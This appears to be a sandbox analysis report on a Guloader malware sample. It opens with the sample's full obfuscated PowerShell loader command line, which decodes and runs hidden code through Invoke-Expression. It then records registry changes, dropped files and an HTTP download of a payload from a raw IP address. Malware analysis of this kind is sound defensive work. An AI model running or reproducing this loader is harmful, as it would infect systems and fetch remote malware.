N`$UnIJanFedTwbSyaSag PeTis a7El)Sp Af`$MoSSikMpi Id He BnBugSuuInl Ke F8Mi;Fi`$StAArn Ut FhGer SaMicVai TtUniRezAvaPrt OiPnoAnnOp2Am= O`"""Su`$KleClnDrv S:ImAPrPJiPTaDUaAFlTsuA R\ KbJay Sp Zl CaSvn ClKogCynMii SnLegdosStuKadDavIoaTrl PgDee HtTv\SwdTunSkg Se BnAcd PesusTa\ SGSirDeuFrfwrfUnlCrySu2Ov1Ma.StDReeNosAn`"""An;St`$BeS DkSoi SdeaeDenOvgBluShlTiest9Ve Se=Pu IsADeaTerPrg Ga anFrgAbsRevSkiFunreeSksSc4Re Sp'PeD P2MoAMl5Tr9PaDRe9TuFSa9ud2Ho9 S3Ge9Sc8Ch9Tr1Na8Fa3Wi9plAKn9Sw3ReDBa6ReCAlB SDTa6 NAPrDBiAAk5Su8PiFSa8Un5 M8da2Fl9Pa3Ba9 FBRaDAr8 BBReFmaBRi9ApDKv8UdBBu0 A9StFGa9AnAgu9He3BaASiB uC SCCoCStCAfABu4Ga9 H3 C9Ty7Va9 M2StBOu7 S9AfAHa9ExAFaB I4Ab8GiFAd8No2Ch9dr3 O8Ve5 FDQuEDiD O2StBMe7Ch9Ca8 R8Re2Da9 FEDe8 M4Ov9om7 N9Ko5 F9UnFNl8 A2Pa9seF S8UnC C9Ln7 S8Ha2Re9JoFIn9Hi9Pe9 K8BaCDy4HoDWiFSu' t;Ac&Tr( K`$FrI SnredHab PaAtgJieFosTi7Ca)Hu L`$ PSBokReiAbdaue NnTrg MuIrl Se H9Sa;Fe`$FeDkoeCavIue UlGeoAfpSomPee tnAat GaBlrImyCa0 B Ri=Me ReA FaAurCagUma SnSegFosDavDiiMonFaeHesRe4Sh Is'coAspD VA A5 M8CoFGs8 S5 U8 r2No9Se3Bl9PrBDiDOm8DaASl4Ov8we3Sn9ar8 C8Fo2no9neF L9ToBMe9By3teDRo8FiBjuFDi9 V8Ab8Re2 D9Ov3La8Fl4De9 L9Ko8Be6 FAUn5 O9Fo3Le8Va4me8 D0 M9 FFFo9 M5Sp9Ps3Sc8 R5reDTi8InB NBAk9Sq7Er8Be4 P8An5zo9InENd9Al7 S9EnAPeAPeB RCMeCToCGlC TBFa5tr9Ka9En8Sh6In8 TFopD DEUlDBa2 mATo5Tu9GaDSe9 PFHa9gl2 M9no3Fl9Sh8Pe9 U1Ab8Da3 s9CeASi9 U3TaDSiALuDDi6BiCFo2WeCTr6KaC E4StCRe2SnD RAfiDBi6 KDBe6PiDAd2WaB I7Iw9sa8 U8Un2No9PlEBy8Pl4Ac9 V7Re9Cu5Ca9 BFRe8 T2Ad9AdF D8JoCTe9 M7Ca8Dk2Co9TeFfo9Kl9re9Co8 PCBe5AhDShAdiDDi6CiCKo0CoCSt4CyCMa6BoDTiFDv'Vi; O&Su(Cr`$doI RnSydkubFiabrg UeFesFe7 E)He Vi`$ FD peFovHaeDil BokipCemspeJinSatThaParmiyNe0Ou; S`$ tF HaPalUndLsihasIttMaoSorMay P=Bo`$VeSKrkStiRod Pe CnHygFruovlSpeEc. PcBuodeu unStt F-Na6 I2Tw0 b- g4Te0Mi2 P4Da; K`$BeDsaePsvMeeIcl PoSypKam UeOpnGrtUda HrWay W1ar In= C FA UaPurEkgBraFlnTngSas BvAsiBrnNeeResUn4 F Ar'BeAPhDJeALi5fo8EmFIn8To5Go8No2Ob9St3Mu9GlBmaDaf8StATh4Ro8Di3 E9Lo8 R8 D2Br9QuF S9BeBGe9Ko3HeDOr8ZyB FF F9 A8 O8 S2Lv9ty3Ru8Vi4sl9Ps9Re8Os6HyAPl5Be9Pr3st8co4Ba8Ho0Ti9KaFIn9Ti5 S9 S3Su8 V5ViDHu8LiBTvBUn9Ha7We8 P4Un8 E5Ya9MyEUd9 B7 M9caABiAEsBChCAlCAwC ACLeBGg5St9Au9Fr8Ma6Bi8SaFTrDPeEFrDUn2PtARa5Ag9OnDBr9SuFMi9Pa2Gr9Pr3Ls9sl8Na9Co1Un8Ps3Vu9MuAPu9Ro3KiDTrAFlDSe6TeCAf0DuCFr4 sCPa6ElDKiDVaCBo2FoC H6SeCUd4NyCFi2FaDpuABeDSc6DiDBo2CoBfoAGa8Sp0Sc9To3Se9BrBSt9Ra7Te9Cl8br9UhDPu9 J3In8Ta5BeDMaASeD E6OpDIn2ExBCa0 I9Ge7Hu9CoAPr9Sl2No9KoFTr8Se5Bu8fi2En9Im9ra8fi4Sa8 sFArDStFNo'Sp;No&Li( M`$BeIpenHad ObStaSpgTiePls I7Sh)Sk Ca`$UlD GedevKieMil OoBlpwhmDieVanLitLoaMerAuyAn1en;Fa`$FgD MehuvSeeQulHoo SpRomDee anSatAma Ar UyAn2Ui Ha=Co SoAInaSprDdgTra FngvgtesPevpriKrn seBos N4 N Kl'ReDPa2HeBVr2Ha9Ha3De8St1Mi9 H7Ym8Al4Vi8He5DoDFi6 TC OB CDUn6VaADuDHyAbr5Fn8DeFPr8Bu5 U8Ap2Ce9Sv3Ra9SeB NDPr8VeAFr4Sa8Wo3Da9De8ch8Si2Ps9SlFRi9KaBUn9Sk3 RDTe8AfBThFWo9 A8Bl8Fa2Ig9Di3Am8Ro4 B9Op9Ga8Ej6VaAPu5Md9Si3Kv8Wh4Mu8Ma0Im9StFan9Sn5Ru9Tr3Pu8Dd5hyDBy8 PBAkB A9Ag7Su8Va4hy8 U5No9MuEPo9 H7Ti9UdAFaAUnBLoC WC FCceCMuBIn1As9 K3St8 m2OvBHa2Sk9Di3Ex9 SAim9Li3Ir9He1Ba9 S7Ro8Ap2Ce9Sk3SkBPu0Op9Om9He8 O4AnBBf0Ho8To3Ov9Ba8 S9Sh5 N8Su2Re9exFOf9Qu9Un9Pr8GrASk6 S9Re9Co9 GFBu9Hj8Di8Ps2 L9Yo3Ud8gr4PuD HE FDSkEph9Sk0Eu9UdDKr8 S6MaDAr6brDDa2 GARe2Ga9Fr7Se9FoA S9gl3Bl9br8Te8Ma2 H9 VA F8Lo5Un8Ex2PsDCh6AhDBl2DeBDr5Er8Tr4Sv8ukFBo8 V6Gi8Ap2In9Fo9 J8Tr3Va8Bu5 PD EFUnD NASaDUp6LeDOvE SBro1TeBin2TrASa2PrDMu6BiBFu6FaDDeEDiAMaDmeBEsFKu9 P8Si8Ki2DrAGi6Fi8Fj2Ri8In4biAUrBInD pAExDFi6AjADiDReB fFEu9Pr8 P8No2LeAUn6Ip8Ki2Sk8At4 FALaBMiDHuABeDRo6PyA MD CBSuFAl9 M8Cy8Ap2FoAIn6Ks8Ya2 G8Li4BeACtBAfDSiAReDCu6NaA KDRuBZoFNa9De8In8Kl2 CASm6cu8Ak2na8 K4spA RBDeDHoACaDFr6 LAKdDRiBCyFBu9Di8Se8Mi2TrASu6Tu8De2Sv8Br4PhAteBSuD SFStDSa6OwDbiE NAsoD SB SFaa9Te8Ul8 v2 VAFr6Sv8Ma2Ud8Ty4siADrBorDapFslD RFinDReFXi'Da;fo&Ni(Ab`$ FICrnSldSab FaAdgPoeInsno7Ud) B S`$OuDsteSpvPeeFrlmeo BpLim sevenErtcaaEtr UyAa2Ve;Va`$AdDReeFrvMoeGelPoofdpInm PeinnKotEtaDerMeyPa3Hy Pe=La OpAVoa prDag ma CnMagTusCavAniLinboeMasWo4La St'SsD A2SvBCa2He9 T3 R8Sk1Af9mo7 I8La4Ty8 C5AfDGe8ReB TF U9Ud8Di8Ar0Ub9Br9Sc9kaDOn9Hy3NeDUdEAnDEx2PlBBy7Br9af8Si8De2Hu9OpEud8Es4Be9Un7Fe9Ud5 l9SaFCo8Ac2Sh9FoF U8 kC D9Di7St8Ur2 B9CiFTa9 E9Jo9sc8GrCPr5 KDPuAEnDSk2DaBPlA W8Re0Bl9fe3En9 DBSk9 B7Ro9Ge8Er9 FDSp9Na3St8La5AnD CALoDUn2JuBTr1Fl9Tl3in9An8 G9 aDAr9 M3Pa9No8Gr9 S2Mu9In3Ch9 SABu8Ha5 P9Or3Po8 U4Di9le8Vi9Co3Br8Fi5FlDReAAlCCh6 RDFyA ACHa6EnDBeF K' F;Cu&Ma( A`$ SIEfnEudFob Sa UgSle OsPa7Ca)Li Pa`$FaD DeCyvSkeDelReoRepEdmGoeMenmotEuaBirAbyWo3Ci#Ef;""";<#Bilet Millionforetagender Stilistikken Dixain Potlines #>;;function xorami ($Hotelvaerelser,$amazedly) { &$Sylt0 (Developmentary9 'Ri$FlHLao StgneVelFavKoaSqeHjrNoeThlGasEne UrEp Po-vebrexMuoDer P S$SoaSom Ra Az PelidhnlAry V ');}Function Developmentary9 { param([String]$Heterodontoid); <#Udveren Lawrence stereoisomer #>; For($Lunefuldes=2; $Lunefuldes -lt $Heterodontoid.Length-1; $Lunefuldes+=(2+1+(1-1))){ <#Sejlernes featheredges Forhaandsgldes Snapsflaskernes Dyblens #>; $Sclerotomies+=$Heterodontoid.Substring($Lunefuldes, 1)} $Sclerotomies;};;$Sylt0 = Developmentary9 'BaI KEMoX J ';$Sylt1= Developmentary9 $Peronosporales;&$Sylt0 $Sylt1;<#Folinger Radisernes Buggies Leveringsdygtigstes #>;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

Add for printing

Total events

2 394

Read events

2 381

Write events

Delete events

Modification events


(PID) Process:	(2000) d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	Key:	HKEY_CURRENT_USER\Software\Repatronizes250
Operation:	write	Name:	salubriousness
Value: FFBA2657
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:	write	Name:	ProxyEnable
Value: 0
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:	write	Name:	SavedLegacySettings
Value: 46000000C5000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(1648) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Local\Temp\nsaB0A7.tmp		—
		MD5:—	SHA256:—
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\Gruffly21.Des		binary
		MD5:BBDE43A48AB6D36A32B1DD60F736A774	SHA256:539E37890E4643B82B3405426BE9071CFFE4607DE951E094E999E3CE7A109FE3
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\Transalpinely.ele		binary
		MD5:885D01443932449065121D0E670F8035	SHA256:192B81B4A046DCC8F27C7F20AA78685CA6AB7F7A163C94C3860A6060A1ECBE2C
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\filosoferedes.vid		binary
		MD5:26516D15E8CC7315452CF69FAEDC8944	SHA256:EDE0A11A2ABE1A347734469E38F5073B1C13262861F657BFD6F377B9D7DB2C5B
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\Kendsgerninger.sls		binary
		MD5:F3A5E151B7A65C3AFD068190EC6AF073	SHA256:FA447C125E0CBE446A7E773D8EC809825746A898EB2C2FACD306157A56D4DC29
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\Afterlifes\Forledelse\Desmerdyrenes.Soe		text
		MD5:684EED9F681D781958D4551A472B20D2	SHA256:134C746344AA1E809CE650B41A197AB4A686EE4658272A08570891FF07C7A7B1
2000	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe	C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\dragoonage.lit		binary
		MD5:30AA76C474915AAEA1171AA395CF47B5	SHA256:26ACB3898692ECD76FFF9EED56D9FB4D0C8DD52D25CA57AB5B26C35D3DD18321
308	powershell.exe	C:\Users\admin\AppData\Local\Temp\uh5rwuwn.sf1.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
308	powershell.exe	C:\Users\admin\AppData\Local\Temp\ca0gxp1x.rw5.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2708	powershell.exe	C:\Users\admin\AppData\Local\Temp\jqkmixqb.bn1.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1648	wab.exe	GET	200	185.202.175.135:80	http://185.202.175.135/iSPVbLeDFyJJX103.bin	unknown	text	252 Kb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
352	svchost.exe	224.0.0.252:5355	—	—	—	unknown
1648	wab.exe	185.202.175.135:80	—	UNREAL-SERVERS	US	unknown

DNS requests

No data

Threats

PID	Process	Class	Message
1648	wab.exe	Potentially Bad Traffic	ET HUNTING Generic .bin download from Dotted Quad

Add for printing

No debug info

General Info

d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe

B7691CF91035B792E916E328F197D1F3

858AC0E3789DED8BA64846BF1D308D98AE85C449

D6C76AC7C95BF8B4A7E162DAB180A6387DF27B0644AD1DB2BFF9B578181ADA37

24576:kMm/8Q9egG9Di44VEEF2b/y1cOO2Eh5fdq/sB4wtGu85jF7u+PXf2O6ZQ2/t+s5j:5m/8Q9egG9Di44VEEF2b/y1cOO2Eh5f3

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Detected an obfuscated command line used with Guloader

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Reads binary file using Get-Content

Application launched itself

Base64-obfuscated command line is found

Reads the Internet Settings

Connects to the server without a host name

INFO

Creates files or folders in the user directory

Reads the computer name

Checks supported languages

Create files in a temporary directory

Creates or changes the value of an item property via Powershell

Checks proxy server information

Reads the machine GUID from the registry

Manual execution by a user

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings